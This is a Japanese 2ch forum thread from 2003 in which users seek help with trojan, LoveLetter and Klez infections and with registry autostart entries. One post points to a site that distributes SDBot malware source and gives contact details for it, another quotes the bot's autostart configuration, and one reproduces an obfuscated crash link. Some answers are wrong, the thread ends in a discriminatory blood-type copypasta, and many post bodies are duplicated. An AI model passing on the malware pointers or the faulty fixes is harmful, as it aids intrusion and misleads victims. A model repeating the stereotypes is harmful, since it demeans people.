129 :名無しさん@お腹いっぱい。:03/02/28 21:11
>>128
それ俺
それ俺
130 :121:03/02/28 23:07
>>122さん
レスありがとうございます。
自分はPCはそこまで詳しくはないのですが、トロイの木馬ブロックの意味は一応分かっているつもりです。
実は二週間ほど前にトロイが検出されたことがあって、それについてはtrendmicro社のHPどおりに
完全に除去できたのですが、その2,3日後から一分間に何回もHDがコリコリ鳴り出して、
原因を調べてみたらウイルスバスターのログにそれまでは一つもなかった木馬ブロックが一杯・・・
という状況なんです。
これはいったい、、、トロイ使いにPC覚えられて外部からアタックしようと狙われているのでしょうか?
それともこの状況は普通で、バスターご使用の皆さんも毎分何回も木馬ブロックがログに残っているものなのでしょうか?
なんだかPCの動作も若干ですが重くなったような気もしますし・・・
よろしくお願いします。
レスありがとうございます。
自分はPCはそこまで詳しくはないのですが、トロイの木馬ブロックの意味は一応分かっているつもりです。
実は二週間ほど前にトロイが検出されたことがあって、それについてはtrendmicro社のHPどおりに
完全に除去できたのですが、その2,3日後から一分間に何回もHDがコリコリ鳴り出して、
原因を調べてみたらウイルスバスターのログにそれまでは一つもなかった木馬ブロックが一杯・・・
という状況なんです。
これはいったい、、、トロイ使いにPC覚えられて外部からアタックしようと狙われているのでしょうか?
それともこの状況は普通で、バスターご使用の皆さんも毎分何回も木馬ブロックがログに残っているものなのでしょうか?
なんだかPCの動作も若干ですが重くなったような気もしますし・・・
よろしくお願いします。
131 :名無しさん@お腹いっぱい。:03/03/01 13:55
age
132 :名無しさん@お腹いっぱい。:03/03/02 02:33
うちのNortonAntiVirusによるとVBSLoveLetter.Aというウイルスに感染した模様です。しかも削除すらできません。これどうしたらよいのでしょうか?詳しい方教えてやってください!
133 :名無しさん@お腹いっぱい。:03/03/02 02:40
>>132
↓これっぽい気がするのだが、違うのであればSymantecのサイト
でとりあえず調べれ
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/
↓これっぽい気がするのだが、違うのであればSymantecのサイト
でとりあえず調べれ
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/
134 :名無しさん@お腹いっぱい。:03/03/02 02:40
135 :名無しさん@お腹いっぱい。:03/03/02 02:41
ウイルスとウイルスが合体したウイルスのニュースの記事はどこですか?
136 :名無しさん@お腹いっぱい。:03/03/02 19:40
age
137 : :03/03/03 00:04
138 : ◆CaKkuEV3EI :03/03/03 00:42
>>137
2ちゃんねらーPC環境調査 というページ
調査終了しますた。ご協力して頂いた方々、サンクス!
結果は↓にありまつ。。
とあり、円グラフでOS、ブラウザ、ディスプレイ解像度、ディスプレイカラー数
が表示してあります。 NIS2002無反応でした。。
今後はブラクラやウイルスの判定にラウンジまたはFLASHの
勇気がなくて見られない画像解説スレへお越しください。
2ちゃんねらーPC環境調査 というページ
調査終了しますた。ご協力して頂いた方々、サンクス!
結果は↓にありまつ。。
とあり、円グラフでOS、ブラウザ、ディスプレイ解像度、ディスプレイカラー数
が表示してあります。 NIS2002無反応でした。。
今後はブラクラやウイルスの判定にラウンジまたはFLASHの
勇気がなくて見られない画像解説スレへお越しください。
139 : ◆CaKkuEV3EI :03/03/03 00:54
ウイルスとその対策にはこちらのスレは有益です。
ログは貴重な財産でいつもこちらのスレを参考に
させていただいています。
あらためて、ありがとうございます。
ログは貴重な財産でいつもこちらのスレを参考に
させていただいています。
あらためて、ありがとうございます。
140 :名無しさん@お腹いっぱい。:03/03/03 08:16
>>137
この板では鑑定はやらない。
鑑定依頼は、ラウンジの
勇気がなくて見られない画像解説スレ Part303
http://ex.2ch.net/test/read.cgi/entrance/1046620158/l50へ。
この板では鑑定はやらない。
鑑定依頼は、ラウンジの
勇気がなくて見られない画像解説スレ Part303
http://ex.2ch.net/test/read.cgi/entrance/1046620158/l50へ。
141 :bloom:03/03/03 09:11
142 :名無しさん@お腹いっぱい。:03/03/03 10:53
>>137
この板のブラクラスレにチェッカーのリンクがあるから自分で鑑定しろ。
ツールに頼らず鑑定できるスキルを身に付けることも重要。
view-source:http://... でソースを見ることが出来るから鍛錬しろ。
この板のブラクラスレにチェッカーのリンクがあるから自分で鑑定しろ。
ツールに頼らず鑑定できるスキルを身に付けることも重要。
view-source:http://... でソースを見ることが出来るから鍛錬しろ。
143 :マーク:03/03/03 13:34
ウイルスは基本的にメールに
基本的にウイルスはメールにファイルが付いてあるはずです。そのファイルを開かなければウイルスに感染する心配はないと思います。
ウイルスがあると思われるメールは題名の文字が変な風になっていたり内容の文字がすべて英語でのようなメールは削除しましょう。
基本的にウイルスはメールにファイルが付いてあるはずです。そのファイルを開かなければウイルスに感染する心配はないと思います。
ウイルスがあると思われるメールは題名の文字が変な風になっていたり内容の文字がすべて英語でのようなメールは削除しましょう。
144 :名無しさん@お腹いっぱい。:03/03/03 13:40
>>143は荒らしです。無視してください。
添付ファイルをクリックしなくても感染することがあります。
日本語の件名で来るウィルスメールもあるので信用しないこと。
アンチウィルスソフトを常駐させること。
添付ファイルをクリックしなくても感染することがあります。
日本語の件名で来るウィルスメールもあるので信用しないこと。
アンチウィルスソフトを常駐させること。
145 :名無しさん@お腹いっぱい。:03/03/04 08:29
age
146 :名無しさん@お腹いっぱい。:03/03/04 08:29
age
147 :名無しさん@お腹いっぱい。:03/03/04 12:35
教えてください。
Yahooのウェブメールを使用していますが、知り合いから受信したメールで容量が
約20KBで、開くとそれほど長くはない通常の文章の下に、記号のような文字がずらずらと
並んでいます。これってウィルスの可能性が高いのでしょうか?
ウィルスバスター2003(リアルタイム検索)は何も反応を示さないのですが、大丈夫と
いうことなのでしょうか。ちなみに添付ファイルはありません。
Yahooのウェブメールを使用していますが、知り合いから受信したメールで容量が
約20KBで、開くとそれほど長くはない通常の文章の下に、記号のような文字がずらずらと
並んでいます。これってウィルスの可能性が高いのでしょうか?
ウィルスバスター2003(リアルタイム検索)は何も反応を示さないのですが、大丈夫と
いうことなのでしょうか。ちなみに添付ファイルはありません。
148 :名無しさん@お腹いっぱい。:03/03/04 12:39
>>147
ウィルスバスター2003は何も反応を示さないんなら問題ないんじゃない。
知り合いに訊いてみたら?
フリーメールで送信したメールに広告のようなものが付加されることがある。
そうしたものが記号ずらずらとなってる可能性はある。
ウィルスバスター2003は何も反応を示さないんなら問題ないんじゃない。
知り合いに訊いてみたら?
フリーメールで送信したメールに広告のようなものが付加されることがある。
そうしたものが記号ずらずらとなってる可能性はある。
149 :名無しさん@お腹いっぱい。:03/03/04 12:49
た デ ウ
だ コ イ
の | ル
文 ド ス
字 で も
列 き
な
き
ゃ
だ コ イ
の | ル
文 ド ス
字 で も
列 き
な
き
ゃ
150 :名無しさん@お腹いっぱい。:03/03/04 13:02
(・∀・)
151 :名無しさん@お腹いっぱい。:03/03/04 15:03
152 :名無しさん@お腹いっぱい。:03/03/04 17:25
「ネットサーフィンでもウイルスに感染する」――IPAが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030304/2/
コンピュータウイルス・不正アクセスの届出状況について[要旨]
ネットサーフィンでの被害に注意!!
http://www.ipa.go.jp/security/txt/2003/03outline.html
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20030304/2/
コンピュータウイルス・不正アクセスの届出状況について[要旨]
ネットサーフィンでの被害に注意!!
http://www.ipa.go.jp/security/txt/2003/03outline.html
153 :名無しさん@お腹いっぱい。:03/03/04 19:29
もしかしてウィルスかもしれないんですが・・・
昨日からOutlookexpressやInternetexplore立ち上げても
回線接続用の小窓(『接続』とか『オフラインで使用』なんかのボタンがついてる窓)
が何度やってもでてきません。
今は仕方ないので、マイコンピューター→ダイヤルアップネットワーク→回線ダブルクリック
で接続してます。
更に各画面の右上に必ず出る−□×がいずれも0,1、rとかになってて
更にそういう細かい狂いが見られるのですがどうしたらいいでしょう。
この間英語のサイトからスクリーンセーバーをダウンロードしてから
AWS WetherBugっていうのも勝手にダウンロードされて来たみたいで
画面の右下はし(時刻表示の隣)に起動時に出て来るようになりました。
これも原因かもと思うのですが、どうやったら自分で直せるかご存知の方いらっしゃいましたら
教えていただけませんか?
昨日からOutlookexpressやInternetexplore立ち上げても
回線接続用の小窓(『接続』とか『オフラインで使用』なんかのボタンがついてる窓)
が何度やってもでてきません。
今は仕方ないので、マイコンピューター→ダイヤルアップネットワーク→回線ダブルクリック
で接続してます。
更に各画面の右上に必ず出る−□×がいずれも0,1、rとかになってて
更にそういう細かい狂いが見られるのですがどうしたらいいでしょう。
この間英語のサイトからスクリーンセーバーをダウンロードしてから
AWS WetherBugっていうのも勝手にダウンロードされて来たみたいで
画面の右下はし(時刻表示の隣)に起動時に出て来るようになりました。
これも原因かもと思うのですが、どうやったら自分で直せるかご存知の方いらっしゃいましたら
教えていただけませんか?
154 :名無しさん@お腹いっぱい。:03/03/04 19:36
155 :名無しさん@お腹いっぱい。:03/03/04 19:47
ウィルスを駆除しようとしたらそのファイルが無くなっていました。
このままでは不安です。どう対処すれば良いですか?
再度スキャンしても反応がありません。
このままでは不安です。どう対処すれば良いですか?
再度スキャンしても反応がありません。
156 :名無しさん@お腹いっぱい。:03/03/04 19:55
感染ファイルがないならそれでいいじゃん。
つか削除したんじゃないの?何でスキャンしたか知らんけど
あとまともに答えてほしかったら環境ぐらい書けよクズ
つか削除したんじゃないの?何でスキャンしたか知らんけど
あとまともに答えてほしかったら環境ぐらい書けよクズ
157 :名無しさん@お腹いっぱい。:03/03/04 20:09
WindowsXP,IE6,VirusScanです。ウィルスはトロイの木馬でした。
駆除するときファイルが無いとエラーが出ました。たぶん削除はしてないと思います。
ディレクトリを確かめましたが見当たりませんでした。
駆除するときファイルが無いとエラーが出ました。たぶん削除はしてないと思います。
ディレクトリを確かめましたが見当たりませんでした。
158 :名無しさん@お腹いっぱい。:03/03/04 20:16
159 :名無しさん@お腹いっぱい。:03/03/04 21:34
携帯メールにKlezが着ました。
受信してもいいですか?
受信してもいいですか?
160 :名無しさん@お腹いっぱい。:03/03/04 22:19
>>159
ご自由にどうぞ。
ご自由にどうぞ。
161 : :03/03/04 22:26
162 :名無しさん@お腹いっぱい。:03/03/04 22:33
Arien.vbsとTalurahoma.vbsが組みこまれているんですけど
レジストリの削除のし方教えて下さい
レジストリの削除のし方教えて下さい
163 :名無しさん@お腹いっぱい。:03/03/04 23:15
今さっき踏んだ下記のリンク先のアドレスがcrashmeになっていました。
ttp://news2.2ch.net|test|read.cgi|newsplus%40195.126.71.77/%63%72%61%73%68%6D%65
オンラインスキャンに行き検索しようと試みましたが作動しません。
至急方法を教えてください。
宜しくお願いします。
ttp://news2.2ch.net|test|read.cgi|newsplus%40195.126.71.77/%63%72%61%73%68%6D%65
オンラインスキャンに行き検索しようと試みましたが作動しません。
至急方法を教えてください。
宜しくお願いします。
何とか削除できました。
お騒がせして申し訳御座いませんでした。
お騒がせして申し訳御座いませんでした。
165 :名無しさん@お腹いっぱい。:03/03/05 08:08
age
166 :名無しさん@お腹いっぱい。:03/03/05 16:49
あげ
167 :cheshire-cat ◆PhCATJR.v6 :03/03/05 18:13
168 :名無しさん@お腹いっぱい。:03/03/05 21:01
ここ数日で急にウイルスメールが増えました。
1日に5〜10通は来ます。
増える時期なんでしょうか?
1日に5〜10通は来ます。
増える時期なんでしょうか?
169 :名無しさん@お腹いっぱい。:03/03/05 21:08
170 :名無しさん@お腹いっぱい。:03/03/05 21:10
大量にウイルスメールが送られてきまふ。
タイトルや差出人は全部違うけど、
プロパティの詳細を見ると先頭にあるReturn-Path: っていうのが
全部同じアドレスです。
その人から来てるってことでつか?
タイトルや差出人は全部違うけど、
プロパティの詳細を見ると先頭にあるReturn-Path: っていうのが
全部同じアドレスです。
その人から来てるってことでつか?
171 :名無しさん@お腹いっぱい。:03/03/05 22:03
172 :名無しさん@お腹いっぱい。:03/03/05 23:53
age
173 :名無しさん@お腹いっぱい。:03/03/06 08:18
age
174 :名無しさん@お腹いっぱい。:03/03/06 11:56
質問です。
先日自宅のPCからトロイの木馬が検出されました。
ウイルスバスター2003が入っているため、検出されたファイルは隔離されたのですが、
以降ファイアーウォールログにトロイの木馬ブロックがかなりの頻度で現れます。
で、トレンドマイクロのHPをよく読んでみたところ、
コンピュータのシステムが改変された場合にはシステムの修復を行う必要があります
とかいてありました。具体的には下記のレジストリの値を削除すればよいようなのですが、
値がランダムであるため、どれを削除してよいかわかりません。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServices
それぞれに含まれる値は以下のとおりなのですが、どれが削除すべき値(通常あるべきでない値)なのか
教えていただけないでしょうか。m(_ _)mよろしくおねがいします。
[Run]
(標準)
Configuration Setup
NeroCheck
PCCClinent.exe
pccguide.exe
Pop3trap.exe
QuickTime Task
Synchronization Manager
TM Outbreak Agent
[RunServices]
(標準)
Configuration Setup
先日自宅のPCからトロイの木馬が検出されました。
ウイルスバスター2003が入っているため、検出されたファイルは隔離されたのですが、
以降ファイアーウォールログにトロイの木馬ブロックがかなりの頻度で現れます。
で、トレンドマイクロのHPをよく読んでみたところ、
コンピュータのシステムが改変された場合にはシステムの修復を行う必要があります
とかいてありました。具体的には下記のレジストリの値を削除すればよいようなのですが、
値がランダムであるため、どれを削除してよいかわかりません。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\RunServices
それぞれに含まれる値は以下のとおりなのですが、どれが削除すべき値(通常あるべきでない値)なのか
教えていただけないでしょうか。m(_ _)mよろしくおねがいします。
[Run]
(標準)
Configuration Setup
NeroCheck
PCCClinent.exe
pccguide.exe
Pop3trap.exe
QuickTime Task
Synchronization Manager
TM Outbreak Agent
[RunServices]
(標準)
Configuration Setup
175 :ぼるぢょあ ◆yBEncckFOU :03/03/06 12:06
>>174
TM Outbreak Agent
↑これ何だ?知らないということは大事だから捨てちゃダメYO-
↓これはバスターのだから消しても問題ないYO-
PCCClinent.exe
Pop3trap.exe
TM Outbreak Agent
↑これ何だ?知らないということは大事だから捨てちゃダメYO-
↓これはバスターのだから消しても問題ないYO-
PCCClinent.exe
Pop3trap.exe
176 :名無しさん@お腹いっぱい。:03/03/06 12:07
>>174
検出名は何?
検出名は何?
177 :名無しさん@お腹いっぱい。:03/03/06 12:10
>>175
知らないということは大事だから捨てちゃダメ・・・
バスターだから消して問題ない・・・
なんだか逆のような気がするのですが・・・
>>176
検出名はBKDR_SDBOT.05.Bです。リンクは↓です。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.05.B&VSect=T
知らないということは大事だから捨てちゃダメ・・・
バスターだから消して問題ない・・・
なんだか逆のような気がするのですが・・・
>>176
検出名はBKDR_SDBOT.05.Bです。リンクは↓です。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_SDBOT.05.B&VSect=T
178 :名無しさん@お腹いっぱい。:03/03/06 12:16
TM Outbreak Agent
↑
これもバスターのタスクでしょ?
見たところ特に怪しそうなのは無いみたいだけど・・・
↑
これもバスターのタスクでしょ?
見たところ特に怪しそうなのは無いみたいだけど・・・
179 :名無しさん@お腹いっぱい。:03/03/06 12:18
180 :名無しさん@お腹いっぱい。:03/03/06 12:19
この前ウイルススキャンをしたら2chブラウザのスレから10個くらいウイルスが出てきたんですが
スレにウイルスが貼られてるみたいでした。これを保存するとパソコンに何か影響が出るんでしょうか
スレにウイルスが貼られてるみたいでした。これを保存するとパソコンに何か影響が出るんでしょうか
181 :名無しさん@お腹いっぱい。:03/03/06 12:22
182 :名無しさん@お腹いっぱい。:03/03/06 12:25
183 :174:03/03/06 12:29
みなさん、即レスありがとうございます。
格別怪しそうなのはないということなのですが、>>179さんのリンクをよんでみたところ、
トロイの木馬はシステムの再起動時に自分自身が必ず実行されるようにするために、次の値か、
Configuration Manager Cnfgldr.exe
System Monitor Sysmon16.exe
または上記に類似した値を次のレジストリキーに追加します。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
とありました。僕ので言うと、[Run][RunServices]の両方にある
Configuration Setup
が気になるところですが、これは通常あっておかしくないものなのでしょうか?
また、怪しいものが[Run][RunServices]にないばあい、ファイアーウォールログに
トロイの木馬ブロックが数十回/分で現れることの原因は何なのでしょう?
しかもログの送信/受信が「送信」になっているのですが・・・
PCがかなりの頻度でカリカリいって、動作が遅くなってしまっています。
度々ですみませんがご教唆くださいm(_ _)m
格別怪しそうなのはないということなのですが、>>179さんのリンクをよんでみたところ、
トロイの木馬はシステムの再起動時に自分自身が必ず実行されるようにするために、次の値か、
Configuration Manager Cnfgldr.exe
System Monitor Sysmon16.exe
または上記に類似した値を次のレジストリキーに追加します。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
とありました。僕ので言うと、[Run][RunServices]の両方にある
Configuration Setup
が気になるところですが、これは通常あっておかしくないものなのでしょうか?
また、怪しいものが[Run][RunServices]にないばあい、ファイアーウォールログに
トロイの木馬ブロックが数十回/分で現れることの原因は何なのでしょう?
しかもログの送信/受信が「送信」になっているのですが・・・
PCがかなりの頻度でカリカリいって、動作が遅くなってしまっています。
度々ですみませんがご教唆くださいm(_ _)m
184 :名無しさん@お腹いっぱい。:03/03/06 12:39
>>183
まだ完全に駆除されていないので、トロイが送信してると思われ。
感染によって作成されたレジストリを完全に削除しる。
亜種が多いので書かれている情報と違うことが多い。
トロイの木馬として検出されたファイルを参照している値も削除。
バスターを一時停止させて、ノートンやマカフィーの体験版で検出してみるのもいいかもしれない。
手に負えないようならOSごとクリーンインストールしる。
まだ完全に駆除されていないので、トロイが送信してると思われ。
感染によって作成されたレジストリを完全に削除しる。
亜種が多いので書かれている情報と違うことが多い。
トロイの木馬として検出されたファイルを参照している値も削除。
バスターを一時停止させて、ノートンやマカフィーの体験版で検出してみるのもいいかもしれない。
手に負えないようならOSごとクリーンインストールしる。
185 :名無しさん@お腹いっぱい。:03/03/06 12:41
186 :ぼぼぢょあ ◆yBEncckFOU :03/03/06 12:45
>>183
ttp://sdbot.xx.net/
多分、これかYO-
e-mail: sdbotxx@mail.ru
sonork id: 100.2600
icq: 21381594
irc: irc.lcirc.net, #sdbot
how to edit the source file
ソースでしかないYO-
リードミー見て自分でコンパイルしろYO-
作者にメールしてみてYO-
ttp://sdbot.xx.net/
多分、これかYO-
e-mail: sdbotxx@mail.ru
sonork id: 100.2600
icq: 21381594
irc: irc.lcirc.net, #sdbot
how to edit the source file
ソースでしかないYO-
リードミー見て自分でコンパイルしろYO-
作者にメールしてみてYO-
187 :ぼぢぢょあ ◆yBEncckFOU :03/03/06 12:50
つか、基本はソース配布だから色々いぢって有るYO-
リードミは結構丁寧だYO-
(・3・) アルェー 忘れたYO-
リードミは結構丁寧だYO-
(・3・) アルェー 忘れたYO-
188 :174:03/03/06 12:59
みなさんありがとうございます。
これで最後の質問にします。
[Run]ないし[RunServices]にConfiguration Setupという値は含まれていて良いものでしょうか?
これで最後の質問にします。
[Run]ないし[RunServices]にConfiguration Setupという値は含まれていて良いものでしょうか?
189 :ぽるじょあ ◆yBEncckFOU :03/03/06 15:25
>>188
(・3・) Eェー
OSはwin2ksp2でバスター2002だと、んな値ないYO−
// sdbot05b.cのソース、デホルトの値だと、
const char filename[] = "syscfg32.exe"; // destination file name
const BOOL regrun = TRUE; // use the Run registry key for autostart
const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart
const char valuename[] = "Configuration Loader"; // value name for autostart
// 他のヴァーヂョンのソースは見てナイYO−
ちなみに186<<ドメインとかメアドは伏字アルYO−
欲しいシトはググルで見付けるYO−
(・3・) Eェー
OSはwin2ksp2でバスター2002だと、んな値ないYO−
// sdbot05b.cのソース、デホルトの値だと、
const char filename[] = "syscfg32.exe"; // destination file name
const BOOL regrun = TRUE; // use the Run registry key for autostart
const BOOL regrunservices = TRUE; // use the RunServices registry key for autostart
const char valuename[] = "Configuration Loader"; // value name for autostart
// 他のヴァーヂョンのソースは見てナイYO−
ちなみに186<<ドメインとかメアドは伏字アルYO−
欲しいシトはググルで見付けるYO−
190 :ぼるじょあ ◆yBEncckFOU :03/03/06 16:37
(・3・) アグェー
191 :名無しさん@お腹いっぱい。:03/03/06 20:28
age
192 :名無しさん@お腹いっぱい。:03/03/06 20:56
C:\SystemVolumeInformation\_restore{4E0CD8E2-4D05-43EB-987A-EEBF20EEBEE59}\RP250\A0022512.vbs
ここにLoveLetterがいるそうなんですがドコに隠れてるんですか?
オンラインスキャンでは見つからなかったんですが。
AVG6.0アンチウイルスシステムを使ってて検出されました
ここにLoveLetterがいるそうなんですがドコに隠れてるんですか?
オンラインスキャンでは見つからなかったんですが。
AVG6.0アンチウイルスシステムを使ってて検出されました
193 :ぽるじょあ ◆yBEncckFOU :03/03/06 23:16
194 :名無しさん@お腹いっぱい。:03/03/06 23:19
>>193
待ってたけど正直意味がわかりません
待ってたけど正直意味がわかりません
195 :ぽるじょあ ◆yBEncckFOU :03/03/07 00:04
>>194
(・ё・) Eェー
_restoreって何だYO−
漏れウインドヅ2000だからわからないC−
ウインドヅメーかXPなのかYO−
つか、、「ME ウイルス 駆除 リストア」でヤフでも検索するC−
(・ё・) Eェー
_restoreって何だYO−
漏れウインドヅ2000だからわからないC−
ウインドヅメーかXPなのかYO−
つか、、「ME ウイルス 駆除 リストア」でヤフでも検索するC−
196 :名無しさん@お腹いっぱい。:03/03/07 10:38
>>192
以下参照。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=5025
"どこに隠れてる"・・・って、そこに隠れてるんでしょ。
オンラインスキャンが利口になって、復元用フォルダは検索しなくなったのかな?
以下参照。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionID=5025
"どこに隠れてる"・・・って、そこに隠れてるんでしょ。
オンラインスキャンが利口になって、復元用フォルダは検索しなくなったのかな?
197 :名無しさん@お腹いっぱい。:03/03/07 12:35
フリーメール(hotmail)にcellpaddingという件名のメールが届きました。付属ファイルは無かったです。メールを見てしまったのですが白紙で何も書いてありませんでした。
outlookで開いたのではなくIEでMSN,hotmailのページから開きました。付属ファイルではなくこのような白紙のメールでもウイルスがついていてIEで見た場合も感染している場合はあるのでしょうか?
一応ノートンでウイルススキャンしたのですが、見つからない場合もあるのかもと心配で質問させていただきました。
説明不足、分かりにくい点がありましたら申し訳ありません。もしよろしければどなたか意見をいただけませんでしょうか?
outlookで開いたのではなくIEでMSN,hotmailのページから開きました。付属ファイルではなくこのような白紙のメールでもウイルスがついていてIEで見た場合も感染している場合はあるのでしょうか?
一応ノートンでウイルススキャンしたのですが、見つからない場合もあるのかもと心配で質問させていただきました。
説明不足、分かりにくい点がありましたら申し訳ありません。もしよろしければどなたか意見をいただけませんでしょうか?
198 :名無しさん@お腹いっぱい。:03/03/07 12:50
>>197
HTMLメールならありうるが、スキャンで発見される(自分で除外設定してなければ)から大丈夫。
HTMLメールならありうるが、スキャンで発見される(自分で除外設定してなければ)から大丈夫。
199 :名無しさん@お腹いっぱい。:03/03/07 12:53
>>197
自分で判定できない奴はバスターかノートン入れて、それを信用しろ。
自分で判定できない奴はバスターかノートン入れて、それを信用しろ。
200 :名無しさん@お腹いっぱい。:03/03/07 12:59
>>197
知らないメールを開けれるあなたの神経が信じられない
知らないメールを開けれるあなたの神経が信じられない
201 :197:03/03/07 13:33
皆様叱咤激励、感想、ご意見ありがとうございました。オンラインスキャンもしてみましたが発見されなかったので信じてみます。このアドレスはある予約受付に使用していたものでして、不注意で開いてしまったのは反省しようと思います。どうもありがとうございました。
202 :名無しさん@お腹いっぱい。:03/03/07 13:58
>>197
http://by1fd.bay1.hotmail.msn.com/cgi-bin/dasp/links_shell.asp?curmbox=F000000001&a=593959d4d07014e6d853c0eaaeb40ad6&matter=faq&nl=1#q12
http://by1fd.bay1.hotmail.msn.com/cgi-bin/dasp/links_shell.asp?curmbox=F000000001&a=593959d4d07014e6d853c0eaaeb40ad6&matter=faq&nl=1#q12
203 :名無しさん@お腹いっぱい。:03/03/07 14:03
204 :名無しさん@お腹いっぱい。:03/03/07 14:45
もういやだ。友達からウィルス来る度にセキユリティソフト入れろっていってるのに
ちっとも入れてくれない。
パソコンかえただのプロ場変えたから大丈夫だのちっとも解決にならないのに。
鬱蔚欝熨
ちっとも入れてくれない。
パソコンかえただのプロ場変えたから大丈夫だのちっとも解決にならないのに。
鬱蔚欝熨
205 :名無しさん@お腹いっぱい。:03/03/07 14:47
206 :名無しさん@お腹いっぱい。:03/03/07 18:18
age
207 :名無しさん@お腹いっぱい。:03/03/07 21:18
age
208 :名無しさん@お腹いっぱい。:03/03/08 12:28
age
209 :名無しさん@お腹いっぱい。:03/03/08 12:51
Norton AntiVirus 検疫レポート
作成: 2003年3月8日 12:49:46
------------------------------------------------------------------------------
ファイル名
場所
状態 サイズ ウィルス名
ユーザー名 コンピュータ名 ドメイン
検疫日
提出日
------------------------------------------------------------------------------
l50[2]
C:\WINDOWS\Temporary Internet Files\Content.IE5\RB08LIZZ
検疫 14.4 KB VBS.LoveLetter.A
unknownUser OEMCOMPUTER N/A
2003年3月8日 12:45:54
未提出
------------------------------------------------------------------------------
これどうしたらいいですか?
作成: 2003年3月8日 12:49:46
------------------------------------------------------------------------------
ファイル名
場所
状態 サイズ ウィルス名
ユーザー名 コンピュータ名 ドメイン
検疫日
提出日
------------------------------------------------------------------------------
l50[2]
C:\WINDOWS\Temporary Internet Files\Content.IE5\RB08LIZZ
検疫 14.4 KB VBS.LoveLetter.A
unknownUser OEMCOMPUTER N/A
2003年3月8日 12:45:54
未提出
------------------------------------------------------------------------------
これどうしたらいいですか?
210 :209:03/03/08 12:52
なんかPCものすごい変な音したんですけど。
211 :名無しさん@お腹いっぱい。:03/03/08 12:57
212 :世直し一揆(コピペ推奨):03/03/08 13:02
<血液型A型の一般的な特徴>(見せかけのもっともらしさ(偽善)に騙されるな!!)
●とにかく気が小さい(神経質、臆病、二言目には「世間」(「世間」と言っても、同じA型を中心とした一部の人間の動向に過ぎないのだが・・・)、了見が狭い)
●他人に異常に干渉し、しかも好戦的でファイト満々(キモイ、自己中心、硬直的でデリカシーがない)
●妙に気位が高く、自分が馬鹿にされると怒るくせに平気で他人を馬鹿にしようとする
(ただし、相手を表面的・形式的にしか判断できず(早合点・誤解の名人)、実際にはた
いてい、内面的・実質的に負けている)
●本音は、ものすごく幼稚で倫理意識が異常に低い(人にばれさえしなければOK!)
●権力、強者(警察、暴走族…etc)に弱く、弱者には威張り散らす(強い者にはへつらい、弱い者に対してはいじめる)
●あら探しだけは名人級でウザイ(例え10の長所があってもほめることをせず、たった1つの短所を見つけてはけなす)
●基本的に悲観主義でマイナス思考に支配されているため性格がうっとうしい(根暗)
●単独では何もできない(群れでしか行動できないヘタレ)
●少数派の異質、異文化を排斥する(差別主義者、狭量)
●集団によるいじめのパイオニア&天才(陰湿&陰険)
●悪口、陰口が大好き(A型が3人寄れば他人の悪口、裏表が激しい)
●他人からどう見られているか、人の目を異常に気にする(「〜みたい」とよく言う、
世間体命)
●自分の感情をうまく表現できず、コミュニケーション能力に乏しい(同じことを何度
も言ってキモイ)
●表面上協調・意気投合しているようでも、腹は各自バラバラで融通が利かず、頑固(本当は個性・アク強い)
●人を信じられず、疑い深い(自分自身裏表が激しいため、他人に対してもそう思う)
●自ら好んでストイックな生活をしストレスを溜めておきながら、他人に猛烈に嫉妬
する(不合理な馬鹿)
●後で自分の誤りに気づいても、強引に筋を通し素直に謝れない(切腹するしかない!)●自分に甘く他人に厳しい(自分のことは棚に上げてまず他人を責める。包容力がなく冷酷)
●男は、女々しいあるいは女の腐ったみたいな考えのやつが多い(例:「俺のほうが男
前やのに、なんでや!(あの野郎の足を引っ張ってやる!!)」)
●とにかく気が小さい(神経質、臆病、二言目には「世間」(「世間」と言っても、同じA型を中心とした一部の人間の動向に過ぎないのだが・・・)、了見が狭い)
●他人に異常に干渉し、しかも好戦的でファイト満々(キモイ、自己中心、硬直的でデリカシーがない)
●妙に気位が高く、自分が馬鹿にされると怒るくせに平気で他人を馬鹿にしようとする
(ただし、相手を表面的・形式的にしか判断できず(早合点・誤解の名人)、実際にはた
いてい、内面的・実質的に負けている)
●本音は、ものすごく幼稚で倫理意識が異常に低い(人にばれさえしなければOK!)
●権力、強者(警察、暴走族…etc)に弱く、弱者には威張り散らす(強い者にはへつらい、弱い者に対してはいじめる)
●あら探しだけは名人級でウザイ(例え10の長所があってもほめることをせず、たった1つの短所を見つけてはけなす)
●基本的に悲観主義でマイナス思考に支配されているため性格がうっとうしい(根暗)
●単独では何もできない(群れでしか行動できないヘタレ)
●少数派の異質、異文化を排斥する(差別主義者、狭量)
●集団によるいじめのパイオニア&天才(陰湿&陰険)
●悪口、陰口が大好き(A型が3人寄れば他人の悪口、裏表が激しい)
●他人からどう見られているか、人の目を異常に気にする(「〜みたい」とよく言う、
世間体命)
●自分の感情をうまく表現できず、コミュニケーション能力に乏しい(同じことを何度
も言ってキモイ)
●表面上協調・意気投合しているようでも、腹は各自バラバラで融通が利かず、頑固(本当は個性・アク強い)
●人を信じられず、疑い深い(自分自身裏表が激しいため、他人に対してもそう思う)
●自ら好んでストイックな生活をしストレスを溜めておきながら、他人に猛烈に嫉妬
する(不合理な馬鹿)
●後で自分の誤りに気づいても、強引に筋を通し素直に謝れない(切腹するしかない!)●自分に甘く他人に厳しい(自分のことは棚に上げてまず他人を責める。包容力がなく冷酷)
●男は、女々しいあるいは女の腐ったみたいな考えのやつが多い(例:「俺のほうが男
